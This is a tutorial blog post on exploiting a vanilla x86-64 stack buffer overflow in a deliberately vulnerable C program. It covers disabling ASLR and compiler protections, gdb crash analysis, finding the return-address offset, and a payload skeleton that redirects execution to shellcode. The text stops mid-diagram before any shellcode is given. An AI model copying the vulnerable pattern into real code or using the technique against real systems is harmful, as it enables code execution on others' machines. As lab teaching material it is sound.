How to Bypass Basic Exploit Mitigation - Part 0x00 - Vanilla Buffer Overflow

Table of Contents

Housekeeping

Buffer Overflow - Basic Concept

Vanilla Stack Buffer Overflow: Example

Deep Dive into the Stack Buffer Overflow

Exploit Development

Conclusions (preventing buffer overflow)

Housekeeping

This blog post series focuses on basic exploit mitigation techniques and how to bypass them during exploitation. It consists of:

  • Part 0 - Vanilla Buffer Overflow
  • Part 1 - Stack Canaries
  • Part 2 - DEP
  • Part 3 - ASLR

This is part 0 of the series that discusses vanilla buffer overflow.

Prerequisites

To fully understand the content of this series, you should have a basic knowledge of the following:

Tools

Throughout this series, we will be using (and you will need to follow along) the following basic tools:

Buffer Overflow - Basic Concept

Let's kick off by briefly describing what a buffer overflow is. A buffer overflow in software occurs when a program writes more data to a buffer (a temporary area of memory) than the buffer is designed to hold, causing the extra data to overwrite adjacent memory regions. This can corrupt program data, crash the application, or even allow for the manipulation of the program's execution and the injection of malicious code.

How Buffer Overflows Happen

Buffers are used extensively in software to store data, often during I/O operations or when processing user input. Suppose a program accepts input without checking its size, and the input is larger than the buffer’s capacity. In that case, the excess data will spill into neighboring memory locations, potentially altering critical program structures or code.
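To make the idea concrete, here is a small Python simulation. It is only a model: a bytearray stands in for memory, and the layout (an 8-byte buffer directly followed by a 1-byte flag) and the names make_memory, unchecked_copy and bounded_copy are hypothetical, chosen for illustration. An unchecked copy of 9 bytes spills into the flag, while a bounded copy cannot touch it.

```python
# Hypothetical memory layout: an 8-byte buffer immediately followed by a 1-byte flag.
BUF_SIZE = 8
FLAG_OFFSET = BUF_SIZE


def make_memory() -> bytearray:
    """Return a fresh simulated region: 8 zeroed buffer bytes, then the flag (0 = off)."""
    return bytearray(BUF_SIZE + 1)


def unchecked_copy(memory: bytearray, data: bytes) -> None:
    """Copy data to the start of the buffer without checking its length,
    the way strcpy() or gets() behave in C."""
    for i, byte in enumerate(data):
        if i >= len(memory):
            # In C the write would keep going into whatever comes next;
            # our model simply ends here.
            break
        memory[i] = byte


def bounded_copy(memory: bytearray, data: bytes) -> None:
    """Copy at most BUF_SIZE bytes, so the adjacent flag is never modified."""
    n = min(len(data), BUF_SIZE)
    memory[:n] = data[:n]


mem = make_memory()
unchecked_copy(mem, b"AAAAAAAA\x01")   # 9 bytes into an 8-byte buffer
print(mem[FLAG_OFFSET])                # 1: the neighbouring flag was overwritten

mem = make_memory()
bounded_copy(mem, b"AAAAAAAA\x01")
print(mem[FLAG_OFFSET])                # 0: the flag is untouched
```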

Programming Languages

Languages like C and C++ are especially prone to buffer overflows because they do not automatically check array bounds or protect against out-of-bounds memory writes. Functions such as strcpy in C are notorious for enabling buffer overflows if not used carefully, and gets cannot be used safely at all (it was removed from the language in C11).

Vanilla Stack Buffer Overflow: Example

Let's consider the following C code. It is the most basic example of a program that is vulnerable to a buffer overflow:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vuln() {
    char name[32];
    printf("\nWhat is your name?\n");
    read(0, name, 256); // here we are overflowing the `name` buffer
}

int main() {
    vuln();
    return 0;
}

On line 6, we declare a variable name, an array of char that can hold up to 32 elements. On line 8, we call the read() function from libc. As the first argument, we pass the file descriptor (0 is stdin, so we read from standard input). Next, we pass our name variable (technically, the array decays to a pointer to the first byte of the 32-byte buffer). Finally, we pass the maximum number of bytes read() will take from the file descriptor, i.e., how many bytes (or characters) of our input can end up in the name buffer.

The issue in this program is that the name buffer is allocated on the stack with a size of 32 bytes, while we attempt to store up to 256 bytes of arbitrary data in it. This, of course, leads to an overflow (as we write the data past the boundary of the name buffer). It is a classic stack buffer overflow example.

Let's try to visualize what's happening:


      before read() call                  name = "andy1337"                   name = A * 64

------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |          andy1337          |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |        `name` buffer       |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |        `name` buffer       |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |        `name` buffer       |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|          RBP value         |     |          RBP value         |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|     ret addr to main()     |     |     ret addr to main()     |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|                            |     |                            |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|                            |     |                            |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------

The first column represents the stack layout before we call the read() function. The second column shows the stack when we provide an input that does not overflow the name buffer. The last column shows what happens if we provide 64 letters "A": the input runs past the end of name and overwrites the saved RBP value and the return address into main() with our arbitrary data.
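The diagram above can be reproduced with a toy Python model of vuln()'s frame. This is a sketch under stated assumptions: the layout (32-byte name, 8-byte saved RBP, 8-byte return address, then 16 more bytes for the two empty rows) follows the diagram, and the saved RBP and return address values passed to fresh_frame are made up for illustration, not taken from a real run.

```python
import struct

# Hypothetical model of vuln()'s frame, lowest address first (top of the diagram).
NAME_SIZE = 32
SAVED_RBP_OFF = NAME_SIZE            # saved RBP follows the 32-byte buffer
RET_ADDR_OFF = SAVED_RBP_OFF + 8     # return address into main() follows saved RBP
FRAME_SIZE = RET_ADDR_OFF + 8 + 16   # plus two more 8-byte rows above


def fresh_frame(saved_rbp: int, ret_addr: int) -> bytearray:
    """Build the frame as it looks before read() is called."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<Q", frame, SAVED_RBP_OFF, saved_rbp)
    struct.pack_into("<Q", frame, RET_ADDR_OFF, ret_addr)
    return frame


def simulated_read(frame: bytearray, data: bytes, nbytes: int = 256) -> int:
    """Mimic read(0, name, nbytes): copy up to nbytes of input starting at `name`,
    ignoring the 32-byte size of the buffer. Bytes beyond our model are dropped."""
    n = min(len(data), nbytes, len(frame))
    frame[:n] = data[:n]
    return n


def saved_values(frame: bytearray) -> tuple[int, int]:
    """Return (saved RBP, return address) as currently stored in the frame."""
    (rbp,) = struct.unpack_from("<Q", frame, SAVED_RBP_OFF)
    (ret,) = struct.unpack_from("<Q", frame, RET_ADDR_OFF)
    return rbp, ret


frame = fresh_frame(0x7FFFFFFFDC50, 0x401180)   # made-up values
simulated_read(frame, b"andy1337")
print(hex(saved_values(frame)[1]))               # 0x401180: still intact

frame = fresh_frame(0x7FFFFFFFDC50, 0x401180)
simulated_read(frame, b"A" * 64)
print([hex(v) for v in saved_values(frame)])     # both now 0x4141414141414141
```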

We will now take a deep dive into what exactly happens and how this behavior can be exploited.

Deep Dive into the Stack Buffer Overflow

First, let's compile our vulnerable program:

gcc -o vuln vuln.c

Output:

vuln.c: In function ‘vuln’:
vuln.c:8:5: warning: ‘read’ writing 256 bytes into a region of size 32 overflows the destination [-Wstringop-overflow=]
    8 |     read(0, name, 256);
      |     ^~~~~~~~~~~~~~~~~~
vuln.c:6:10: note: destination object ‘name’ of size 32
    6 |     char name[32];
      |          ^~~~
In file included from vuln.c:3:
/usr/include/unistd.h:371:16: note: in a call to function ‘read’ declared with attribute ‘access (write_only, 2, 3)’
  371 | extern ssize_t read (int __fd, void *__buf, size_t __nbytes) __wur
      |                ^~~~

We will see a couple of warnings highlighting the exact issue we're trying to demonstrate (the compilers are so smart these days), which we will, of course, ignore.

That's how you would usually compile a C program. The resulting binary is still vulnerable, but it's 2025, and several protections are enabled by default. Since later in this post we will write a simple exploit for this vulnerability, we don't want to deal with those protections just yet, so we will disable them.

First, let's disable Address Space Layout Randomization (ASLR) at the kernel level:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

You can re-enable it later with:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
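If you want to confirm the current setting from a script before debugging, a minimal Python helper could look like the following. The helper names are hypothetical; the meaning of the values 0, 1 and 2 follows the Linux kernel's documentation for randomize_va_space.

```python
from pathlib import Path

# Meanings of kernel.randomize_va_space per the Linux kernel sysctl documentation.
ASLR_MODES = {
    0: "disabled",
    1: "conservative: stack, mmap base and VDSO are randomized",
    2: "full: conservative mode plus heap (brk) randomization",
}


def describe_aslr(raw: str) -> str:
    """Translate the raw contents of randomize_va_space into a description."""
    value = int(raw.strip())
    return ASLR_MODES.get(value, f"unknown value {value}")


def current_aslr(path: str = "/proc/sys/kernel/randomize_va_space") -> str:
    """Read the live setting (Linux only)."""
    return describe_aslr(Path(path).read_text())
```

On a Linux machine, print(current_aslr()) should report "disabled" after the first echo command above.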

Second, let's recompile our program with these protections disabled. To see which protections are currently enabled, we can use the checksec tool (available through package managers such as apt, and also bundled with Python pwntools as pwn checksec):

pwn checksec ./vuln

Output:

[*] '/home/kali/bof/vanilla/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

Here's how to compile it with all protections disabled:

gcc -no-pie -fno-stack-protector -z execstack vuln.c -o vuln

Output:

vuln.c: In function ‘vuln’:
vuln.c:8:5: warning: ‘read’ writing 256 bytes into a region of size 32 overflows the destination [-Wstringop-overflow=]
    8 |     read(0, name, 256);
      |     ^~~~~~~~~~~~~~~~~~
vuln.c:6:10: note: destination object ‘name’ of size 32
    6 |     char name[32];
      |          ^~~~
In file included from vuln.c:3:
/usr/include/unistd.h:371:16: note: in a call to function ‘read’ declared with attribute ‘access (write_only, 2, 3)’
  371 | extern ssize_t read (int __fd, void *__buf, size_t __nbytes) __wur
      |                ^~~~

This will print the same warnings as before, but since we know what we're doing, let's ignore them. -no-pie produces a non-position-independent executable, so the binary's own code and data are always loaded at the same fixed address (0x400000 here) instead of a randomized one; -fno-stack-protector tells gcc to disable stack protection (such as stack canaries, which we will discuss in detail in a later post); and -z execstack marks the stack as executable (we need this so that the CPU can execute our payload directly from the stack).
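To see what -no-pie and -z execstack change in the file itself, here is a minimal sketch of two of the checks a tool like checksec performs: the ELF type (ET_EXEC for a fixed-address executable, ET_DYN for a PIE) and the flags of the PT_GNU_STACK program header. It assumes a little-endian 64-bit ELF file, it is not how checksec itself is implemented, and inspect_elf64 is a hypothetical name.

```python
import struct

ET_EXEC, ET_DYN = 2, 3          # ELF e_type values
PT_GNU_STACK = 0x6474E551       # GNU program header describing stack permissions
PF_X = 0x1                      # "executable" bit in p_flags


def inspect_elf64(data: bytes) -> dict:
    """Report PIE status and stack permissions of a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)

    stack = "GNU_STACK missing"
    for i in range(e_phnum):
        # Each program header starts with p_type (4 bytes) and p_flags (4 bytes).
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            stack = "executable" if p_flags & PF_X else "non-executable"
            break
    return {"pie": e_type == ET_DYN, "stack": stack}
```

Usage on our binary would be along the lines of: with open("./vuln", "rb") as f: print(inspect_elf64(f.read())).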

If we check our binary now, we should see that the protections relevant to this post are disabled:

pwn checksec ./vuln

Output:

[*] '/home/kali/bof/vanilla/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No

Note that the gcc 14.2.0 used here did not enable stack canaries by default (the first checksec run already reported No canary found), but this depends on your distribution and compiler version, so it's better to pass the -fno-stack-protector option anyway.

Let's now try to run it and provide some input:

./vuln

Output:


What is your name?
andy

We're asked to provide the input, which we do, and the program exits successfully.

Now, the name variable is a 32-element array, but we know that we can provide up to 256 characters in our input (since that's what we passed to the read() function), so let's provide an input that is a little bit larger:

./vuln             

Output:

What is your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
zsh: segmentation fault  ./vuln

As you can see, if we provide an input that is longer than the name array, the program crashes with a segmentation fault, which indicates that the process tried to access memory it is not allowed to access. So what exactly happened here?
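The same check can be scripted. Below is a minimal Python sketch (run_with_input and died_from_sigsegv are hypothetical names) that feeds input to a program and tells whether it was killed by SIGSEGV. It relies on the POSIX behaviour of Python's subprocess module, where a process killed by signal N reports a return code of -N; this is the same -11 that pwntools prints later in this post.

```python
import signal
import subprocess


def run_with_input(argv: list[str], data: bytes) -> tuple[int, bytes]:
    """Run argv, feed `data` on stdin, and return (returncode, stdout)."""
    proc = subprocess.run(argv, input=data, capture_output=True, timeout=10)
    return proc.returncode, proc.stdout


def died_from_sigsegv(returncode: int) -> bool:
    # subprocess reports "killed by signal N" as a negative return code -N.
    return returncode == -signal.SIGSEGV
```

For our binary, run_with_input(["./vuln"], b"A" * 50 + b"\n") should yield a SIGSEGV status. The captured stdout may come back empty: when stdout is a pipe, the C library buffers the prompt, and that buffer is lost if the program crashes before flushing it.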

Debugging

To better understand what is happening, let's run our program in a debugger (note that, in this example, and for simplicity, I don't use any gdb extensions). We know that our program will ask for some input, and since our name buffer is 32 bytes long, let's generate something significantly bigger.

To do that, we will use a cyclic pattern of length 80 (the length is determined by trial and error, but I usually start with roughly twice the original length):

pwn cyclic 80

Output:

aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa

This command generates a de Bruijn sequence: a string in which every 4-byte subsequence (the default chunk size) appears only once. This way, when we hit a segmentation fault and inspect the registers and the stack layout, we will know precisely how large the overflow is, where exactly it lands on the stack, which part of the pattern overwrites the saved return address (the value that ret would load into the RIP register on x86-64), and how much space we have for the arbitrary code we want to execute.
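To demystify what pwn cyclic does, here is a self-contained Python sketch of a de Bruijn pattern generator and lookup. It uses the standard recursive de Bruijn construction over the lowercase alphabet with 4-byte subsequences, which reproduces the 80-byte pattern above. It is an illustration, not pwntools' own code, and de_bruijn, pattern and pattern_offset are hypothetical names.

```python
import string
from itertools import islice


def de_bruijn(alphabet: bytes = string.ascii_lowercase.encode(), n: int = 4):
    """Yield bytes of a de Bruijn sequence over `alphabet` in which every
    n-byte substring occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the sequence, like `pwn cyclic <length>`."""
    return bytes(islice(de_bruijn(n=n), length))


def pattern_offset(value: int, n: int = 4, search_len: int = 20_000) -> int:
    """Offset of a 64-bit value read from a register or the stack.
    The value is little-endian in memory; only its first n bytes are searched."""
    needle = value.to_bytes(8, "little")[:n]
    return pattern(search_len, n).find(needle)


print(pattern(80).decode())
print(pattern_offset(0x6161616C6161616B))   # 40
```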

Let's now run our program in gdb:

gdb ./vuln

Output

GNU gdb (Debian 16.3-1) 16.3
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
(gdb)

First, let's enable the Intel syntax, so that the assembly we look at is not too hurtful to our eyes. We do that with set disassembly-flavor intel:

---snip---
Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
(gdb) set disassembly-flavor intel

Now, run our program with r:

---snip---
Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
(gdb) set disassembly-flavor intel
(gdb) r

The program will run, and ask us for a name:

---snip---
Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
(gdb) set disassembly-flavor intel
(gdb) r
Starting program: /home/kali/bof/vanilla/vuln 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

What is your name?

This is where we supply the cyclic pattern we generated before with pwntools:

---snip---
Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
(gdb) set disassembly-flavor intel
(gdb) r
Starting program: /home/kali/bof/vanilla/vuln 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

What is your name?
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa

After we enter this string and hit enter, the program will continue and eventually crash:

---snip---
Starting program: /home/kali/bof/vanilla/vuln 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

What is your name?
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa
Program received signal SIGSEGV, Segmentation fault.
0x0000000000401165 in vuln ()

The debugger reports that the program received a SIGSEGV, which is a segmentation fault, and our program crashed in the function vuln (). Now, to understand what happened, let's analyze the crash.

First, let's check exactly where we crashed. We can do that either by examining the RIP register, like so: x/i $rip, or we can disassemble the code we're currently at, by typing disass:

---snip---

What is your name?
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401165 in vuln ()
(gdb) disass
Dump of assembler code for function vuln:
   0x0000000000401136 <+0>:     push   rbp
   0x0000000000401137 <+1>:     mov    rbp,rsp
   0x000000000040113a <+4>:     sub    rsp,0x20
   0x000000000040113e <+8>:     lea    rax,[rip+0xebf]        # 0x402004
   0x0000000000401145 <+15>:    mov    rdi,rax
   0x0000000000401148 <+18>:    call   0x401030 <puts@plt>
   0x000000000040114d <+23>:    lea    rax,[rbp-0x20]
   0x0000000000401151 <+27>:    mov    edx,0x100
   0x0000000000401156 <+32>:    mov    rsi,rax
   0x0000000000401159 <+35>:    mov    edi,0x0
   0x000000000040115e <+40>:    call   0x401040 <read@plt>
   0x0000000000401163 <+45>:    nop
   0x0000000000401164 <+46>:    leave
=> 0x0000000000401165 <+47>:    ret

As you can see, gdb tells us that we're currently at the ret instruction, at address 0x0000000000401165, i.e., at offset vuln() + 47. We should note this address, as we will set a breakpoint at this location several times during the exploitation process.

What's also essential at this point is that, although we've overwritten the saved return address into main() on the stack, when you examine the registers by typing info reg in gdb, you can see that the RIP register is not, in fact, overwritten with our payload:

---snip---
   0x0000000000401164 <+46>:    leave
=> 0x0000000000401165 <+47>:    ret
End of assembler dump.
(gdb) info reg
rax            0x51                81
rbx            0x7fffffffdd48      140737488346440
rcx            0x8c032900000000    39409971368034304
rdx            0x51                81
rsi            0x7fffffffdc00      140737488346112
rdi            0x0                 0
rbp            0x6161616a61616169  0x6161616a61616169
rsp            0x7fffffffdc28      0x7fffffffdc28
---snip---
rip            0x401165            0x401165 <vuln+47>
---snip---

The RIP value is 0x401165, which, as you can see in the previous snippet, is the address of the ret instruction itself. This means we crashed before ret completed. This is one of the nuanced differences between 32-bit and 64-bit architectures.

To fully understand what's happening, let's first look at what ret actually does: it pops the 8-byte value at the top of the stack (which we have overwritten), places it in the RIP register, and the CPU then continues executing at that address. On 32-bit x86, any 32-bit value is a valid address, so ret loads our junk into EIP, and the crash only happens when the CPU tries to fetch an instruction from that unmapped address (which is why 32-bit examples typically show EIP = 0x41414141). On x86-64, virtual addresses must be canonical: with 48-bit addressing, bits 63 through 47 must all be equal. The value ret would pop here comes from our cyclic pattern and is not canonical, so the CPU raises a general protection fault before updating RIP, and the kernel delivers it to our process as SIGSEGV. That's why RIP still points at ret. (If the popped value were canonical but unmapped, RIP would be updated and the fault would occur at the new address instead.)
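The canonical-address rule can be expressed in a few lines of Python. This sketch assumes 48-bit virtual addresses (4-level paging); systems using 5-level paging allow 57 bits, hence the va_bits parameter. is_canonical is a hypothetical helper name.

```python
def is_canonical(addr: int, va_bits: int = 48) -> bool:
    """True if `addr` is a canonical x86-64 virtual address, i.e. bits
    63..(va_bits - 1) are either all zeros or all ones."""
    top = addr >> (va_bits - 1)                 # bits 63..47 for 48-bit addressing
    all_ones = (1 << (64 - va_bits + 1)) - 1    # 17 one-bits for 48-bit addressing
    return top == 0 or top == all_ones


print(is_canonical(0x6161616C6161616B))   # False: ret faults before touching RIP
print(is_canonical(0x7FFFFFFFDC30))       # True: a user-space stack address
```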

Continuing the analysis of our crash, we should next inspect our stack to determine the value on top. We need this information to determine what would be loaded to the RIP register if it were a valid memory address, and also to identify where in our payload this value is located.

So, let's examine the layout of our stack:

---snip---
   0x0000000000401164 <+46>:    leave
=> 0x0000000000401165 <+47>:    ret
End of assembler dump.
(gdb) info reg
rax            0x51                81
---snip---
rsp            0x7fffffffdc28      0x7fffffffdc28
---snip---
rip            0x401165            0x401165 <vuln+47>
---snip---
(gdb) x/5gx $rsp
0x7fffffffdc28: 0x6161616c6161616b      0x6161616e6161616d
0x7fffffffdc38: 0x616161706161616f      0x6161617261616171
0x7fffffffdc48: 0x6161617461616173
(gdb)

We can see that the stack was overflowed with our payload. To determine where in the payload we start overwriting the saved return address into main(), we use the cyclic tool again, passing it the value from the top of the stack (in our case, 0x6161616c6161616b):

pwn cyclic -l 0x6161616c6161616b

Output:

40

As you can see, we start overwriting the saved return address at offset 40 in our payload. This is where we need to place the address of the instruction we want the CPU to execute next.
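This offset can also be cross-checked by hand. x86-64 is little-endian, so the 8-byte value on the stack corresponds to the bytes kaaalaaa in memory. In the first 100 bytes of the pattern, every 4-byte chunk is a letter followed by aaa, so the chunk starting with k sits at 10 * 4 = 40. The disassembly agrees: lea rax,[rbp-0x20] shows that name starts 0x20 bytes below RBP, so the saved RBP is 32 bytes past the start of name and the return address 8 bytes after that. A minimal Python sketch of this arithmetic (qword_to_bytes and offset_in_first_run are hypothetical names):

```python
import struct


def qword_to_bytes(value: int) -> bytes:
    # Little-endian: the least significant byte sits at the lowest address.
    return struct.pack("<Q", value)


def offset_in_first_run(chunk: bytes) -> int:
    """Offset of a 4-byte chunk of the form b"?aaa" (only valid for the
    first 100 bytes of the default pattern, where chunks are a..y + b"aaa")."""
    if chunk[1:] != b"aaa" or not (ord("a") <= chunk[0] <= ord("y")):
        raise ValueError("chunk is not in the first run of the pattern")
    return (chunk[0] - ord("a")) * 4


top_of_stack = 0x6161616C6161616B   # x/gx $rsp at the crash
rbp_at_crash = 0x6161616A61616169   # RBP after `leave` restored the overwritten value

NAME_TO_RBP = 0x20                  # from `lea rax,[rbp-0x20]`
offset_saved_rbp = NAME_TO_RBP      # saved RBP is stored at [rbp]
offset_ret = NAME_TO_RBP + 8        # return address is stored at [rbp+8]

print(qword_to_bytes(top_of_stack))                          # b'kaaalaaa'
print(offset_in_first_run(qword_to_bytes(top_of_stack)[:4]))  # 40
```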

At this point, we have all (or most) of the information we need to start developing an exploit for this vulnerability. We will do that next.

Exploit Development

Before we start developing the exploit, let's think about what we want it to do. In practice, this decision often comes late, because what you can achieve is largely dictated by the nature of the bug and the environment it lives in. In our case, it is pretty simple: we don't have any memory protections in place, and we can supply the program with a relatively large payload. With that in mind, let's say we want to spawn a shell to take control of the system running the program.

Let's discuss our plan for exploit development. Ideally, we want to hijack the program's control flow and redirect it to arbitrary code we supply, so that the CPU executes it. This arbitrary code is called shellcode.

Here's what we know so far, which is important for the exploit development:

  • The application crashes with a segmentation fault if we supply it with a long enough string of data.
  • Starting at offset 40 (i.e., the 41st byte of our input), we overwrite the saved return address.
  • Offset 40 is where we need to store the address of the instruction we want the CPU to execute after ret.
  • The shellcode we want the CPU to execute has to be provided in our payload and live somewhere on the stack.

Here's what we don't know:

  • Which instruction do we want to execute?
  • Where is that instruction in the program?
  • How does this one instruction redirect the control flow to the shellcode?

Addressing our unknowns will help us refine the plan for our exploit. There are different techniques to redirect the control flow to our shellcode. One technique described in many resources is to find and use the address of a jmp rsp instruction. This would allow us to proceed as follows:

  • At the moment of the crash, ret pops the address of jmp rsp (which we supply in our payload) from the stack into the RIP register.
  • The CPU executes the jmp rsp instruction, which redirects the control flow back to the stack (to whatever the RSP register points at).
  • The CPU then executes whatever comes next on the stack, but note that this time, it doesn't treat this data as an address, but as actual instructions.

This means that if we build our payload so that, after offset 40, we supply the address of jmp rsp followed by our shellcode, ret will pop the address of jmp rsp first, leaving our shellcode on top of the stack, and jmp rsp will redirect the control flow to the stack itself, where our shellcode is ready to be executed.

Unfortunately, our program is small and doesn't contain a jmp rsp instruction. There are other instructions we could try, but they fall under Return-Oriented Programming (ROP), which we will discuss in detail in the next post.
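Checking whether a binary contains such an instruction boils down to searching its executable bytes for the encoding of jmp rsp, which is FF E4 (opcode FF /4 with a register operand). Below is a minimal Python sketch of that search; find_gadget is a hypothetical name, and obtaining the bytes of the .text section and its load address (for example, from readelf -S) is left out. The match does not need to be aligned to a real instruction boundary: FF E4 hidden inside a longer instruction works just as well. pwntools also offers ELF.search() for this kind of lookup.

```python
JMP_RSP = b"\xff\xe4"   # machine code for `jmp rsp`


def find_gadget(code: bytes, base: int, needle: bytes = JMP_RSP) -> list[int]:
    """Return the virtual address of every occurrence of `needle` in `code`,
    assuming `code` is mapped starting at virtual address `base`."""
    hits, start = [], 0
    while (i := code.find(needle, start)) != -1:
        hits.append(base + i)
        start = i + 1
    return hits
```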

For now, let's follow the naive approach and take advantage of the fact that ASLR is disabled, so the addresses of the stack and our shellcode are almost always the same (we will discuss some exceptions later). This approach lets us use the static address of the stack after ret is executed, which will point directly to our shellcode. We find this address with gdb.

Recall the earlier snippet where we looked for the offset in our payload at which to place the address of the next instruction. At the moment of the crash, RSP points to the top of the stack, i.e., the slot holding the saved return address. In our case, as you can see in the snippet below, RSP is 0x7fffffffdc28:

---snip---
   0x0000000000401164 <+46>:    leave
=> 0x0000000000401165 <+47>:    ret
End of assembler dump.
(gdb) info reg
rax            0x51                81
---snip---
rsp            0x7fffffffdc28      0x7fffffffdc28
---snip---
rip            0x401165            0x401165 <vuln+47>
---snip---
(gdb) x/5gx $rsp
0x7fffffffdc28: 0x6161616c6161616b      0x6161616e6161616d
0x7fffffffdc38: 0x616161706161616f      0x6161617261616171
0x7fffffffdc48: 0x6161617461616173
(gdb)

What we want is to take this address and place it directly after the part of our payload that fills the buffer (i.e., at offset 40). However, recall what the ret instruction does: it pops the 8-byte value at 0x7fffffffdc28 into RIP and increments RSP by 8. Whatever we place right after the return address will therefore start at the next address, 0x7fffffffdc30, and that is the address we should use (note: this address might be different on your system).

With that in mind, here's how our payload will look initially:

payload = b"A" * 40
payload += p64(0x7fffffffdc30)
payload += shellcode  

First, our payload includes 40 bytes of filler, which fill the name buffer and the saved RBP value; the next 8 bytes overwrite the saved return address. There, we place the address of our shellcode, which will be on top of the stack right before ret is executed. Finally, we add our shellcode, which will start at the top of the stack after ret is executed.
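Before involving the real program, we can sanity-check this layout with a small Python model: build the payload with struct.pack (for our purposes equivalent to pwntools' p64, a 64-bit little-endian value), then emulate ret by popping 8 bytes at RSP into RIP and advancing RSP by 8. The addresses are the ones from our gdb session, SHELLCODE is a placeholder of int3 bytes rather than real shellcode, and build_payload and simulate_ret are hypothetical names.

```python
import struct

OFFSET = 40                   # bytes before the saved return address (pwn cyclic -l)
RET_SLOT = 0x7FFFFFFFDC28     # RSP at vuln()'s `ret` in our gdb session
TARGET = RET_SLOT + 8         # where the shellcode starts once `ret` pops 8 bytes
SHELLCODE = b"\xcc" * 16      # placeholder (int3 bytes), NOT real shellcode


def build_payload(target: int, shellcode: bytes, offset: int = OFFSET) -> bytes:
    """Filler, then the new return address, then the code to run."""
    return b"A" * offset + struct.pack("<Q", target) + shellcode


def simulate_ret(payload: bytes, ret_slot: int, offset: int = OFFSET):
    """Model memory starting at `name` (ret_slot - offset) and execute `ret`."""
    base = ret_slot - offset                                 # address of `name`
    rsp = ret_slot
    (rip,) = struct.unpack_from("<Q", payload, rsp - base)   # pop into RIP
    rsp += 8
    start = rip - base
    code = payload[start:] if 0 <= start < len(payload) else b""
    return rip, rsp, code


payload = build_payload(TARGET, SHELLCODE)
rip, rsp, code = simulate_ret(payload, RET_SLOT)
print(hex(rip), hex(rsp), code == SHELLCODE)   # 0x7fffffffdc30 0x7fffffffdc30 True
```

Note that the packed address contains two zero bytes (0x00007fffffffdc30). That's fine here because read() copies raw bytes, but a string function such as strcpy would stop at the first null byte and cut the payload short.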

Once the ret is called, the address 0x7fffffffdc30 will be popped from the stack, placed in the RIP register, and the CPU will execute the instruction that is at this address. At that point, what will be at this address? That's right: our shellcode!

Let's visualize how the stack will look after we overflow the name buffer with our payload:


      before read() call                  name = "andy1337"           name = A * 40 + RSP + shellcode

------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |          andy1337          |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |        `name` buffer       |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |        `name` buffer       |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |        `name` buffer       |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|          RBP value         |     |          RBP value         |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|     ret addr to main()     |     |     ret addr to main()     |     |       0x7fffffffdc30       |
------------------------------     ------------------------------     ------------------------------
|                            |     |                            |     |         shellcode          |
